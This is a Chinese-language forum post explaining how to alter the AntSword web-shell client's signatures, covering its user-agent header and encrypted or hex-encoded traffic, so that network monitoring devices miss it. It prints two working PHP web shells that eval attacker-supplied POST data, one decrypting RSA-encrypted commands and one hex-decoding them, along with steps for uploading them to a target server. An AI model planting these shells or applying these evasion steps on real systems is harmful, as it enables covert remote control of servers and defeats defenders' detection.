T O P

[资源分享]     蚁剑特征修改

  • By - 楼主

  • 2021-09-13 14:07:49
  • 简介

    我们常常在测试过程中经常用到蚁剑,如果没有修改一些特征,会被一些流量设备轻易的发现,所以在这里写一下对蚁剑的一些特征进行修改

    修改UA头

    新版本蚁剑已经将UA头改为随机获取了,这里讲一下老版本的

    首先在蚁剑中设置代理到burp

    在burp的数据包中能清楚的看到蚁剑的特征

    在目录/modules/request.js文件中修改UA头

    /modules/update.js文件修改

    修改完后,UA就变为我们自己想要的头了

    流量加密

    蚁剑支持rsa加密方式

    直接使用自带的shell上传到目标服务器

    <?php
    $cmd = @$_POST['id'];
    $pk = <<<EOF
    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCCVQo4Wjt9ZfRpZE4E+BBZ62E+
    lWx178V16xzuYswqZuoCjo6Az9J/1wHySL73IQZgTZF5inPEfuW2Ep73aGSo0nLm
    qckDmCuys7OSD+Ni2NjGzd5VQD2wP0he+TpcL7b0BJYEtdGqyGvuqZLECvtp8KTD
    jukTOI/HBDUjCyhzhwIDAQAB
    -----END PUBLIC KEY-----
    EOF;
    $cmds = explode("|", $cmd);
    $pk = openssl_pkey_get_public($pk);
    $cmd = '';
    foreach ($cmds as $value) {
      if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
        $cmd .= $de;
      }
    }
    eval($cmd);
    

    链接前得新建一个ras的编码器,在链接shell的时候使用

    链接的时候选择我们刚才新建的编码器

    蚁剑链接shll后可看到请求包已被加密

    除了使用自带的一些编码器之外,我们也可以直接写编码器,该github有一些编码器的分享

    这里测试一下hex的编码,先添加一个hex的编码器

    上传shell到服务器

    <?php
    foreach($_POST as $k => $v){$_POST[$k]=pack("H*", $v);}
    @eval($_POST['ant']);
    ?>
    

    链接时选择hex编码器

    数据已被编码

    本帖子中包含资源

    您需要 登录 才可以下载,没有帐号?立即注册